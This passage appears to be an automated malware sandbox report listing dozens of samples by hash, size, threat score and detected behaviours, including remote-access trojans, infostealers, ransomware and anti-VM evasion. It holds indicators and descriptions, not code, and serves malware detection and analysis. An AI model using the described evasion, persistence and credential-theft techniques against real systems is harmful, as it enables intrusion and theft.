      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

    behavioral33behavioral34

    • Target

      foo/2e00df497f82c0bf215548969fefc18b

    • Size

      8.6MB

    • MD5

      2e00df497f82c0bf215548969fefc18b

    • SHA1

      6f1f6f9e8f40055644670378da81ea668c8b69f5

    • SHA256

      3386ab7ec029dca692f7f8e3214fcfa97f88c42cf384807d9a5c56a146e89ed9

    • SHA512

      0ce197d3f63995265d4c9d8c51ffd2317065c8d653dd8135882ba0fe2201fbb3cfff66b8a88a6f2626a292918cdeccda026b6f9430c6d57196c162688dd03a0b

    Score
    9/10
    upx

    • ACProtect 1.3x - 1.4x DLL software

      Detects file using ACProtect software.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Loads dropped DLL

    • Drops file in System32 directory

    behavioral35behavioral36

    • Target

      foo/2e90a15707ad3eb4cd06bd8a05463922

    • Size

      403KB

    • MD5

      2e90a15707ad3eb4cd06bd8a05463922

    • SHA1

      5190382aaac9a76a31315f3e3b3bc6b12fac2738

    • SHA256

      b594e7917381e1089e150150bb0db36cef541d0226fec4ff681f3cf32cb8be36

    • SHA512

      1838ba984c52c21621e68b87fb257590255085177a073b3b0d318802fa24a79317fa96a07d87068ae8b57418adf2fbf93cf9a313e20ba19b6a82420f00427358

    Score
    6/10
    persistence
    behavioral37behavioral38

    • Target

      foo/2f215e008c6a7d8886c578e442b8f1b0

    • Size

      200KB

    • MD5

      2f215e008c6a7d8886c578e442b8f1b0

    • SHA1

      a4409e2c333fa3aaa4e0b718775d325fcf76cb41

    • SHA256

      6903fcc0ca7851ca2aad10ae4ebc3533eda1f1d85f7f0f6df39082d6c562b867

    • SHA512

      4cf2365b786d5894d335c2fa421901fd45dcac709974eda1ed2bb2f8d7c443c20b5975af17ee337d81986909c03786800929a36d53ed317a353a2e88bb621a3c

    Score
    10/10
    cobaltstrikebackdoortrojan
    behavioral39behavioral40

    • Target

      foo/30bc06d0add076dd6500fcdfbc12643e

    • Size

      322KB

    • MD5

      30bc06d0add076dd6500fcdfbc12643e

    • SHA1

      def54b6b4ca0d0ea952510cb8c0e3ee2a5f85a3e

    • SHA256

      5038cf5a6ef817ad95a57c8cc8da89e66e24c83fafef450618b4d3e18ebdd9b4

    • SHA512

      6576b45177e01f0c8bec1e1728ed69df450b2f6f7c62aeb8ba85df54b48a37e90925eddfbbce4080fd44c08266a5fec92cdfcb6efb7518e1e808b3b488686314

    Score
    10/10
    imminentspywaretrojan

    • Imminent RAT

      Remote-access trojan based on Imminent Monitor remote admin software.

      trojanspywareimminent

    • Drops desktop.ini file(s)

    behavioral41behavioral42

    • Target

      foo/312e67dc35992949937d1bad6ba529f3

    • Size

      476KB

    • MD5

      312e67dc35992949937d1bad6ba529f3

    • SHA1

      b1b33ac2b7b82240369b43289c9dafe498df63d5

    • SHA256

      0a58ffc4705b353154ea7347fd495b0e34d25da5f3094f52d43e312ea8163f81

    • SHA512

      9097b5896ea47777fbe389e0cf75ebbdf943695559db78b2fd06aae400ab8a852d7d216fe7687e78418404d238092eec77b4e9601dd33fe34accab0a2791dbb3

    Score
    4/10
    behavioral43behavioral44

    • Target

      foo/383497fda5ca670a06dc688443c2011b

    • Size

      623KB

    • MD5

      383497fda5ca670a06dc688443c2011b

    • SHA1

      c622ebf694003368c3246e166a3a7bfc6b787652

    • SHA256

      d84d8ebcdfb0abcd821c24197517a5e329a1a6ae8e534509db78899b147cd60f

    • SHA512

      5f1f854690f9743a09fcdd0b6be43fd09af3eb5bc0f1ee4c20659458e34f46c33eec8eb651e569315902d99a12a217e5dea750411effca79485fa343c24d0129

    Score
    10/10
    matrixdiscoverypersistenceransomware

    • Matrix Ransomware

      Targeted ransomware with information collection and encryption functionality.

      ransomwarematrix

    • Executes dropped EXE

    • Loads dropped DLL

    • Modifies file permissions

      discovery

    • Adds Run key to start application

      persistence

    • Drops desktop.ini file(s)

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    behavioral45behavioral46

    • Target

      foo/39555eb0403a69906729713ad20888ec

    • Size

      502KB

    • MD5

      39555eb0403a69906729713ad20888ec

    • SHA1

      3496ed1ff1c3ede32a025b33eec820cdf5512ca9

    • SHA256

      7926fbb4fe0c69379b2c1ac217cfd0a09ff9a73e48c24d3c464785119d8ab349

    • SHA512

      674c3048cf7798c407138474a40b318f1465d920493d6a057de0cbd6befb66649a0f9e0059b042c1141cad40ae38800c8b98a9ea3140d6ae998b88aa1d2ec9ae

    Score
    10/10
    hawkeyekeyloggerpersistencespywarestealertrojan

    • HawkEye

      HawkEye is a malware kit that has seen continuous development since at least 2013.

      keyloggertrojanstealerspywarehawkeye

    • NirSoft MailPassView

      Password recovery tool for various email clients

    • NirSoft WebBrowserPassView

      Password recovery tool for various web browsers

    • Nirsoft

    • Uses the VBS compiler for execution

    • Adds Run key to start application

      persistence

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral47behavioral48

    • Target

      foo/39e5310f67f0b1bf98604a2e0edb9204

    • Size

      104KB

    • MD5

      39e5310f67f0b1bf98604a2e0edb9204

    • SHA1

      3a2d3638449252c6d890c4061bcd92e733a7cdb3

    • SHA256

      4f91d0b1c9a27ac005f37227e1ef9f9e796cbbe896be2407d23a89734ddbdf3f

    • SHA512

      30c373c76c2910d4aa4671c06fde272ca40d012a353f7c6004643c95da5a486c124662bd303b42501ac29b801cdcfc05cf853764477184d247ffbaf4f02838c8

    Score
    10/10
    evasionpersistencetrojan
    behavioral49behavioral50

    • Target

      foo/3aba72d1f87f4372162972b6a45ed8cd

    • Size

      364KB

    • MD5

      3aba72d1f87f4372162972b6a45ed8cd

    • SHA1

      62eaec946e6c05d6279737e9e5583831beb383e8

    • SHA256

      31bae2c85740d091f58896a36a461191d666e33f3ad5d8a4e529bc74bf024b6c

    • SHA512

      d66f28238e74c13057da5f8a6d89807d7d513c542dd65d5005334e360b22d82cc4be7826ce1e3d1372c44c68a4acd8ff662adddb4affffbadfd174ccbd016249

    Score
    1/10
    behavioral51behavioral52

    • Target

      foo/406c9b9529109f835fe7292e6cf3fefe

    • Size

      468KB

    • MD5

      406c9b9529109f835fe7292e6cf3fefe

    • SHA1

      80a616526044d8b3dfe9848b73c8873f474b27ae

    • SHA256

      eeaed429ed196822dfded9099479bbb7d9cd48cdb96a986627512e607badfa66

    • SHA512

      ce013422daaea03d9d31c713cc6ce1e0349b862f3d2b52ef9ee151b6e1e20ea0724e71000d6f2d10b953cd3bcc5b5e2dd69cbfe858b451811a2152c623e7a92d

    Score
    10/10
    agentteslakeyloggerpersistencespywarestealertrojan

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

      keyloggertrojanstealerspywareagenttesla

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

      spyware

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

      spyware

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Adds Run key to start application

      persistence

    • Drops desktop.ini file(s)

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral53behavioral54

    • Target

      foo/457cfd3e7a53e7500f8206b3ea300aca

    • Size

      193KB

    • MD5

      457cfd3e7a53e7500f8206b3ea300aca

    • SHA1

      7426d503db90a0795e279968009ac03853cdfbed

    • SHA256

      feb51e59044de8b60c0e72553b2cfc7aea655af83068cf934525eec303d65c10

    • SHA512

      cd1896539b4f1732ee6be803ca5eb012d1ed69d0bb2be71dd09d17fc7d831a2a7bbfb78cee1b1a6545c7bf00c1855dc502ce1ab0ace7432cabc2d2a00db8df43

    Score
    7/10
    adwarediscoverypersistencestealer

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery

    • Installs/modifies Browser Helper Object

      BHOs are DLL modules which act as plugins for Internet Explorer.

      stealeradware

    • Drops file in System32 directory

    behavioral55behavioral56

    • Target

      foo/4761e4b165f62d326b9032d96329e460

    • Size

      793KB

    • MD5

      4761e4b165f62d326b9032d96329e460

    • SHA1

      59aaeba76ac34841d60aef175309161d2b5e4992

    • SHA256

      5f6884586533f6065ec2c0557e63e1b5865f0b22c42a386a338cc211ec1a308b

    • SHA512

      c2ce8e91fcd7697b5f7b6e5a7a62f2552be4388f3fbc1dc0003893edb133731160736852f2fab62c18f06d8f773e7dca96ade6e151b2c0163599d49269e46a9d

    Score
    8/10
    persistence

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral57behavioral58

    • Target

      foo/487f1b1f30212eaa9104c084a667f104

    • Size

      5.7MB

    • MD5

      487f1b1f30212eaa9104c084a667f104

    • SHA1

      e562c8d364fea1f1f4524c30a0606598b8814096

    • SHA256

      8b72156895f47b7f216b544937a46a3909bc07134ebac1c586de7aac3eab18a5

    • SHA512

      c6ad92308792d2135ce918fcc1b88a15a3c928c30a99de2366f7477df9196dff9d287e8d84c2176f4b7385adee5b2601402cc2deee84d26060057ea044d59ddd

    Score
    8/10
    spywareupx

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware
    behavioral59behavioral60

    • Target

      foo/4a74c9f378007412ec2c8b2eea6da4cf

    • Size

      512KB

    • MD5

      4a74c9f378007412ec2c8b2eea6da4cf

    • SHA1

      7ed849c7e9f2c70af40a6feb46d57bd5f06c3a8d

    • SHA256

      4ef7144d88b296b15236dd8866cf50d4f20657551da60897ceb2e67ec8bad793

    • SHA512

      5043709c2e1f1b339df4cd035ad959746ebe6ecbf43ee2ebe9718367581a6c557ccd3a0c3f2615e8fe0ce6ac1efc169348ddafde77f2d82984eb945d09d4f4d2

    Score
    10/10
    lokibotpersistencespywarestealertrojan

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

      trojanspywarestealerlokibot

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Adds Run key to start application

      persistence

    • Suspicious use of SetThreadContext

    behavioral61behavioral62

    • Target

      foo/4b2d7854b47943b118e24c6ec79b974b

    • Size

      4.2MB

    • MD5

      4b2d7854b47943b118e24c6ec79b974b

    • SHA1

      e80270395d82212d41e64f8afe0203b8061bf9fe

    • SHA256

      ccce7394fc1a6e1730f440e2d20183c830f30bb7cb446a54ca18277974205503

    • SHA512

      64216c5bbd286496e33adb03e80e1aec67a2c6e2f8f1088804dc95182d42e978aa77f8366c384b4bed5eebdd5e15ad5484bf839b6fb8a35799819c64d05f3162

    Score
    8/10

    • Executes dropped EXE

    • Loads dropped DLL

    behavioral63behavioral64

    • Target

      foo/4c49c2496ae538bcec9e1510f3eb8eba

    • Size

      176KB

    • MD5

      4c49c2496ae538bcec9e1510f3eb8eba

    • SHA1

      2d62b087f6a1504b57fe65fef38ee8c831bf7aa5

    • SHA256

      a149cb7f8d29506837ecad9e9b7e7a1e8fd23ba5716c653b2bd3d9bac9eccd6e

    • SHA512

      8cfecc9d516603a41c0801f75cec51b318d39b4985745439a433cfc0c1eded9dc8d5c2258ff7de358191211041345eb7c74e969dd69262cf09cb724eb59333b6

    Score
    1/10
    behavioral65behavioral66

    • Target

      foo/4cfe8f3aa1592035b9a2cdb2c4f54c77

    • Size

      2.0MB

    • MD5

      4cfe8f3aa1592035b9a2cdb2c4f54c77

    • SHA1

      ed8024ea02ca996e74c40459ff35c78cefdf111f

    • SHA256

      0aa9b861be9e293f3d71e39949141e7c87c52e3f4f8b0ea4d26b768b0c188bc2

    • SHA512

      42cc40eb614b4afbf08ae8646c7511ffcdfbf3c3af924ff20d40b5499acf1f1136e4809aa5428c5b260e4b8676041cdb70ef74904b0c09ab5944db1cf89cff3e

    Score
    9/10
    evasion

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

      evasion

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

      evasion

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    behavioral67behavioral68

    • Target

      foo/4ea45460c3e7c3d8486d3f7bec90c613

    • Size

      6.0MB

    • MD5

      4ea45460c3e7c3d8486d3f7bec90c613

    • SHA1

      303c290738a2d89d4bbd365da80650ef5a55bcab

    • SHA256

      a0ea757d9a9ec9e09bc806dbb1526fb5b90692ccc1f31aded8e3dbd0abcde5ec

    • SHA512

      1ad7731246a7dfce4cc656481af68f8f4f37d511b453431f32dfec6078313eb636047031d9341e4e62b969ae95c600877b9c49a28168e3c7e02de4371be88228

    Score
    8/10

    • Executes dropped EXE

    • Loads dropped DLL

    behavioral69behavioral70

    • Target

      foo/52d6c59fcfe73048a240c7fdd1f04d7e

    • Size

      9.7MB

    • MD5

      52d6c59fcfe73048a240c7fdd1f04d7e

    • SHA1

      e8af78f67fb5859b54d10e865b7a1070b4d34f46

    • SHA256

      93b36133201cfe77b1319c72d9b0b4ed471a6337a58f6b30f926f1786159ec82

    • SHA512

      cfd767ea4063205a57894d9d8f09f205c8e9bc71b8052985076496c136b98f037aa7b274cc225c5ad759ddc530ccb6201cacdfa8c6a015311331f2589b4ff8ca

    Score
    7/10

    • Loads dropped DLL

    behavioral71behavioral72

    • Target

      foo/55fc11ec67a00177d047d5abc84231e0

    • Size

      35KB

    • MD5

      55fc11ec67a00177d047d5abc84231e0

    • SHA1

      acbd513fa686cdbc50ae7f69d41fb8384255658a

    • SHA256

      d65e0dea8a361b12e8d278afbf103d0bda2753fd9c1e14a779bc92fbc4c1e144

    • SHA512

      206a0f9fe46bd39910f6224f41dab028b74312b1ed9a3052f97f44771a5d43b01e32ba5b3bab40adf7b877a1d48371d140dfa4b3241ab2b54d8bfc3cc74f930e

    Score
    10/10
    njratevasionpersistencetrojan

    • njRAT/Bladabindi

      Widely used RAT written in .NET.

      trojannjrat

    • Executes dropped EXE

    • Modifies Windows Firewall

      evasion

    • Drops startup file

    • Adds Run key to start application

      persistence

    • Legitimate hosting services abused for malware hosting/C2

    behavioral73behavioral74

    • Target

      foo/59f0fbc29bace019804b8a181ce75a06

    • Size

      568KB

    • MD5

      59f0fbc29bace019804b8a181ce75a06

    • SHA1

      c3a44b6ea913ce4eb32f04930ea60043d79c3a0a

    • SHA256

      b2e8676b7a04f3582470aa3de91b39ba731fdf072907d8d843d052d73c87405e

    • SHA512

      a68ce42173331381d1618929cdb7cff9d3220afd151856c62c6eb015faaba61c1141a7bb2af5d1b58b1732cafa2286acbd2c95115f2a789c7a3454bc96b63ce2

    Score
    1/10
    behavioral75behavioral76

    • Target

      foo/5b1c0df2be80006ec3af6a5eeea17ecb

    • Size

      777KB

    • MD5

      5b1c0df2be80006ec3af6a5eeea17ecb

    • SHA1

      b2353f17d51fc76dec8681df4526406e7c9113a6

    • SHA256

      6ad2f4284d0c364d7a2664100ec5448607d1e064c3d1a65e4e737769ba3cda25

    • SHA512

      607334838181a37883132906e562944cd54221f28c2efa279cade7ce8829550d20c11d864797118ff476497144cd84218282bb97cd4b4cf8fa13f753459ad7eb

    Score
    1/10
    behavioral77behavioral78

    • Target

      foo/5bc72a1ae433663758319d97917b77ea

    • Size

      5.5MB

    • MD5

      5bc72a1ae433663758319d97917b77ea

    • SHA1

      889f6f4ec2347ded9924ff9a51c14d0e0347feaa

    • SHA256

      c84eb9ad415a282bbdb0adced711af66631e29a4e0606a566f1477018f9315f5

    • SHA512

      8e3000e76531bc8332003016ff926e9330ef28d154f8f04d2f522b6cb822df10323d811fc5116919944e74483fd3bcded30bbcc0b14fd26e5041a68dcdace551

    Score
    8/10
    bootkitpersistence

    • Executes dropped EXE

    • Loads dropped DLL

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

      bootkitpersistence
    behavioral79behavioral80

    • Target

      foo/5d33050f0514054c49f2bc2ff9abee2a

    • Size

      272KB

    • MD5

      5d33050f0514054c49f2bc2ff9abee2a

    • SHA1

      2cdf78701185d2d773666af2d8ea4e0b04781bf9

    • SHA256

      65b2fb3df4cf7da2980a6af696bdee3df2effd65228cc56f51a5d8fb29469e68

    • SHA512

      e22b419fd86cc4d0af4c48c0a53abf1afda4715dd92acbb3296f4e1f32a588364c1b48c9eb3b2214c1f834d79ca541cdd79a13d8975d91337970d7cf320f61be

    Score
    7/10

    • Loads dropped DLL

    behavioral81behavioral82

    • Target

      foo/5d9775622b5e7123d5796d4de5dc2839

    • Size

      133KB

    • MD5

      5d9775622b5e7123d5796d4de5dc2839

    • SHA1

      176ef2d48f75b9be26882040e69fc95fa8b02e5b

    • SHA256

      a57aefff0656b1266ff25b5e4972e6829ffec6a5855597587e026d28881dc62c

    • SHA512

      ffd89d99223fabfe4def0b27bab031ea76f50fd3be36b27f3d76754bb333784f91985e1c88a7e1991ee334ab98b42f3b0cb2e38dcb5d6599bf0d98ac8f73089e

    Score
    8/10
    persistence

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral83behavioral84

    • Target

      foo/60121ea2ab380455f7e143cd9438443e

    • Size

      98KB

    • MD5

      60121ea2ab380455f7e143cd9438443e

    • SHA1

      091fd74c5caebd9f53c34781ad6b0241883fe698

    • SHA256

      b8f7c90cd170ba8c79c472997c17509e2d241a54a9cef7efea4dac23b043afe8

    • SHA512

      3f42a0756999d6441721f8d4663c8af677c895c4e11ddff25d7a1216b3b4a015b7d3763c0e06f616f73eb5e9df3b42e07baf8d5ec910632f3e275c8d2fd388e6

    Score
    9/10
    evasionransomware

    • Clears Windows event logs

      evasionransomware

    • Executes dropped EXE

    • Deletes itself

    • Loads dropped DLL

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Sets desktop wallpaper using registry

      ransomware
    behavioral85behavioral86

    • Target

      foo/62565a39c4a264e48e0678edad5d60fd

    • Size

      856KB

    • MD5

      62565a39c4a264e48e0678edad5d60fd

    • SHA1

      1dc0f3920082e9f3e789d5d1587d9c7b47d58a5e

    • SHA256

      d9d3596268e269cb48aee92aaa47a50f785f8568f319aad812af163da28e7a40

    • SHA512

      9b851c15b072ba5e0b316f2f02ff49fbb483fd5b4545d7c225f27ddfe8ef0fc99747a5b14bbad6b6373c1b562984c22d52d83c65970ce5ffc5209a5dc1e715cc

    Score
    10/10
    qakbot1535648626bankerpersistencestealertrojan

    • Qakbot/Qbot

      Qbot or Qakbot is a sophisticated worm with banking capabilities.

      trojanbankerstealerqakbot

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral87behavioral88

    • Target

      foo/62a3fd9b4932e59a7192813c22617764

    • Size

      453KB

    • MD5

      62a3fd9b4932e59a7192813c22617764

    • SHA1

      202a619fdab056d51bde34db8683839feccf0da5

    • SHA256

      8b433a97defbbddb0922aa477226ab820f388d9d38ba10d8d8b89917053880be

    • SHA512

      87846d0a4d55c209dc5dcdec1e9c9dee7beedce840d099df4fa5ced0e814183162d25a3e3ae8b56dc533ac9dedfc612631559da7e5cc19985a6bb3d0ff80ba54

    Score
    10/10
    imminentpersistencespywaretrojan

    • Imminent RAT

      Remote-access trojan based on Imminent Monitor remote admin software.

      trojanspywareimminent

    • Executes dropped EXE

    • Deletes itself

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Drops desktop.ini file(s)

    behavioral89behavioral90

    • Target

      foo/63e9ce22dbf66934fd75c77bc84954d0

    • Size

      563KB

    • MD5

      63e9ce22dbf66934fd75c77bc84954d0

    • SHA1

      c48e6b5974e2f10c5c4e0426a898fbcf7a67c8cf

    • SHA256

      550d461697099ebb3a5ee86336bd3358a05850f2835738d6520a552527b096a6

    • SHA512

      e14692ed9673f2926ea62b6e9f128953fa79b1ce3df8452656e11e479af7a187784a5aa893719d3e8438e8697b7793292d46a0a9adc6a400e610eb288976036a

    Score
    8/10

    • Executes dropped EXE

    • Drops startup file

    • Loads dropped DLL

    behavioral91behavioral92

    • Target

      foo/6497ba06c339ec8ca438ddf0dd2f8fc5

    • Size

      29KB

    • MD5

      6497ba06c339ec8ca438ddf0dd2f8fc5

    • SHA1

      4287ee2103467196df93fad515a844bd2b94df78

    • SHA256

      dcf7b759aae3ce6597eeca586238419728e432770451522a0f0d1873463aac20

    • SHA512

      45b97bcc1dbc060cb5d461fd945759c60fa943f18e1b777592183fdc6cb9719578669d5ab914e4e0be1fd3e2356e88bd2e54f71f13b586c9892d034b751c5277

    Score
    10/10
    limeratrat

    • LimeRAT

      Simple yet powerful RAT for Windows machines written in .NET.

      ratlimerat

    • Executes dropped EXE

    • Loads dropped DLL

    • Legitimate hosting services abused for malware hosting/C2

    behavioral93behavioral94

    • Target

      foo/698cc868cdae13a5cc744020ec00e331

    • Size

      2.5MB

    • MD5

      698cc868cdae13a5cc744020ec00e331

    • SHA1

      cb498c95868eb907422351cff294476fa474f856

    • SHA256

      2e0bbdb1882e670a907d79987fb5ea80a050f7a57b17196bdd2ec42e3c4e2b95

    • SHA512

      e8b7631c4bc2c76a4ed9b706636f6bd25c6556d1bcb1c21e296022d030005cee29f692f5f773fe47511b66e3bf45005f7d0e7b4b3cc19cde38632029759e2b3b

    Score
    7/10

    • Loads dropped DLL

    behavioral95behavioral96

    • Target

      foo/6f2c5c31fefa00afa2af1adcbdd93ad5

    • Size

      6.1MB

    • MD5

      6f2c5c31fefa00afa2af1adcbdd93ad5

    • SHA1

      f460f3caff95e713dea4105ab48aa06331ea5d5e

    • SHA256

      00ba0c7b8b90f5ef0a432c893ef0f90fa91b1e7c4a74d1c49d8fc9a63c6e8a17

    • SHA512

      fe9564cecf0997cbfefe5818688261f894179101a71315f4351addd35d0e3539e2e67f79fa9e45bc02f57bd8e325cea9763978df52522fc4d7774e70c18daa13

    Score
    7/10

    • Loads dropped DLL

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    behavioral97behavioral98

    • Target

      foo/798f5e61531f527821a490a15ef957ba

    • Size

      100KB

    • MD5

      798f5e61531f527821a490a15ef957ba

    • SHA1

      8b9cf50467ecccda66fe065e52994a0df369b139

    • SHA256

      1b2d37bb6b98fb77496db754816296b740a2fe7a8e3d0a5263a8002d16a1b5f9

    • SHA512

      9706113b056b96f4c5f89a3991a2adddbe1d7a6e44d03ce919edf88ead8e500eed4b84d5b2886ec4f733003bd751ba9653ad810bf7b8046aa94711f2552d628e

    Score
    10/10
    evasionpersistencetrojanupx

    • Modifies Windows Defender Real-time Protection settings

      evasiontrojan

    • Windows security bypass

      evasiontrojan

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Loads dropped DLL

    • Windows security modification

      evasiontrojan

    • Adds Run key to start application

      persistence
    behavioral99behavioral100

    • Target

      foo/7aec86c6c4cc35139b7874a0117e4451

    • Size

      707KB

    • MD5

      7aec86c6c4cc35139b7874a0117e4451

    • SHA1

      b597ea073119727156f95b5224d6db7ddc370bee

    • SHA256

      48749cd789a40b8358f06ce41100985b4544162df8ed47bfc17c72242756d50b

    • SHA512

      7f8f596607a925bb72b91b7a9fc78d9094ec4a5a5dc41c866f9dcf961daee52dc4052d2ace663b021301e1cb715c3ba9f209ddc7e48ef07b46283673b647c561

    Score
    1/10
    behavioral101behavioral102

    • Target

      foo/84bf6e1a8fcd94cf6cba6ac7e2a95b64

    • Size

      685KB

    • MD5

      84bf6e1a8fcd94cf6cba6ac7e2a95b64

    • SHA1

      cc788b747b956cac871f55be59995e4bf57901db

    • SHA256

      f2e8ae7bffb3210efb4a5baf9ee1875e1143d2d73614adb292b44bb143b3ffd9

    • SHA512

      058fd21be218125c20aa1a715d9c53151ed68283465a2e2a8acdb534e95818bc8f9b99a74a13c963c2839b3955e38f217d8475fafd91eec0eaebeeba152e6b65

    Score
    8/10

    • Executes dropped EXE

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Loads dropped DLL

    behavioral103behavioral104

    • Target

      foo/907b7d9a23ed7821abb700fcbe1c9bb3

    • Size

      3.7MB

    • MD5

      907b7d9a23ed7821abb700fcbe1c9bb3

    • SHA1

      6caba04b65d28c5a0d0666572c40022fa1f1acca

    • SHA256

      e37ca180d6f18e361f5cbc3f6c6f0ae4d301018e45891b32cf93da490d62f607

    • SHA512

      d407ddae4f820e1aff994adf9e88952d5756fd1c0b6eef58e28a72fc7c455af991fb4294931ebb2eaee5133d2e56f72f5013e45a1b5d0fe17416d1b0583346f1

    Score
    8/10
    upx

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx
    behavioral105behavioral106

    • Target

      foo/928f1db0c63d122f0183686a3bdfccee

    • Size

      842KB

    • MD5

      928f1db0c63d122f0183686a3bdfccee

    • SHA1

      8fb82a9595afb94e6e77a9ac3555e2b1abfdbbb5

    • SHA256

      78fabf339b726203334bb592812ab42c8652ab37535eeccf2e457df257d7a881

    • SHA512

      6f500e95cdb91a07fb0af0aff671054f6628752d563c34a0ad691c2727ffd9f7107da71f7c84550a95a2850eae1bb60b5271fbca7d648d88748a28859310ccb5

    Score
    1/10
    behavioral107behavioral108

    • Target

      foo/9401b0788dc22eeb1dace02d23a9596c

    • Size

      552KB

    • MD5

      9401b0788dc22eeb1dace02d23a9596c

    • SHA1

      b5dde6f4feaec905d14dedd1d7957e556797e84c

    • SHA256

      048d9773dc60db5173e4cc0ccdb9eff1ca61e2a7bd1b7e357388d9cd8e94ada5

    • SHA512

      5d3796bb2e9c5a1753a7ad9ddff26eed7f1289196c5d40b0be946a52b3818406cf9b7b776f677c5e252b2eb294077034aaaf4cbe05cf64a66eeeb0466965264d

    Score
    1/10
    behavioral109behavioral110

    • Target

      foo/97dd8726304f889ef12ef1beb510be84

    • Size

      679KB

    • MD5

      97dd8726304f889ef12ef1beb510be84

    • SHA1

      2358917da7fcf07e9b165dfb3961b9212e37b671

    • SHA256

      424ef529e699a29eb1324f71f56a3d0728079926ea793cb8ebbee71ddbfeabf1

    • SHA512

      d141a224a4c55b4b4c7ef2348b5accd7a3ba9bebb0dd5eaafbc08060746a0a9082c7ab93a022b20ac2fb2255293430da729d995ab5b0106ab064c0c0c5b4eeb4

    Score
    10/10
    gozi_ifsbbankertrojan
    behavioral111behavioral112

    • Target

      foo/9b8c48e6186718b7b290ceed9369a1a4

    • Size

      826KB

    • MD5

      9b8c48e6186718b7b290ceed9369a1a4

    • SHA1

      816a6a15054568dd2f51e25ac73178f9a0182d82

    • SHA256

      f05ec8838752a3b917acbd2e742e03646f091ef5ce97bf1eef75810cebbfc93b

    • SHA512

      6ff8ac1f9b6c296679458022b375548e8c322809e4a1887551ca0cb553f0cf864e43361edd6e1a2ee8a9b3b3a5680a95689b2bf91785aea68baaca6be91339b9

    Score
    8/10
    discovery

    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery
    behavioral113behavioral114

    • Target

      foo/9cde71abfd2a6aeb83cdd233cbc04fcd

    • Size

      146KB

    • MD5

      9cde71abfd2a6aeb83cdd233cbc04fcd

    • SHA1

      a1cb6ad95fe9df8fefe9dd0753b88cfc852368f0

    • SHA256

      e742096e51fcd3e8c19d43cd26dd25235f04a0af5a64343754e2e46bb90c3816

    • SHA512

      8a6a152626b9b912089e6c68193788fbc2258f56b359fa20d0b09f4033cdd357d9e661de6c0a8378aeaf2c66f6ccef8f86cc624fcf97d90f004213eb2ebbfe04

    Score
    6/10
    discovery

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery
    behavioral115behavioral116

    • Target

      foo/9d3438ba1dbdbcc2a65451893e38004b

    • Size

      2.0MB

    • MD5

      9d3438ba1dbdbcc2a65451893e38004b

    • SHA1

      d981bd3d2abb18bcd1421c9de38bf1854f4c13b1

    • SHA256

      8f04cf8f8be775e065bce4ff33ca3afc7711aea57b5fb91c488bc03af1df58da

    • SHA512

      6818546c2a967a0d63814e77e339656939eaae510591e3888b8abb8626d89132ac51774efe0912c083072b2314040d1d5c2f0ccc463669a7bc34b2d134b714ba

    Score
    8/10
    upx

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx
    behavioral117behavioral118

    • Target

      foo/9f88187d774cc9eaf89dc65479c4302d

    • Size

      326KB

    • MD5

      9f88187d774cc9eaf89dc65479c4302d

    • SHA1

      4c1e5e0bb72c78c4ce0d37aed939478aaa35a94f

    • SHA256

      5ee12dd028f5f8c2c0eb76f28c2ce273423998b36f3fc20c9e291f39825601f9

    • SHA512

      e03a4000bc7cac0332f2060ad58cadbe65a4283d012606f8395a6e63c42fa5e7b98f8ebf40d438c56332e19e845658d70a7ef99d2343323bd701e56c3b0cd0e7

    Score
    8/10

    • Executes dropped EXE

    • Deletes itself

    behavioral119behavioral120

    • Target

      foo/a17bdcde184026e23ae6dc8723f73fcf

    • Size

      784KB

    • MD5

      a17bdcde184026e23ae6dc8723f73fcf

    • SHA1

      faea5147df4768b101d0fd214c7fbf7a9cb048a0

    • SHA256

      a358e56c91218b5f21d54556fb7aef5de158da4764c9cf8e5d71e3e41ff4841f

    • SHA512

      90d58f8e290bc751fd3f945ad5de218f93d8605578c87972359edcc9e87d84473f2ebd54452c09d2bc9ba4d11f9412742e9f1d3bb9c9cd67a17cd58693624616

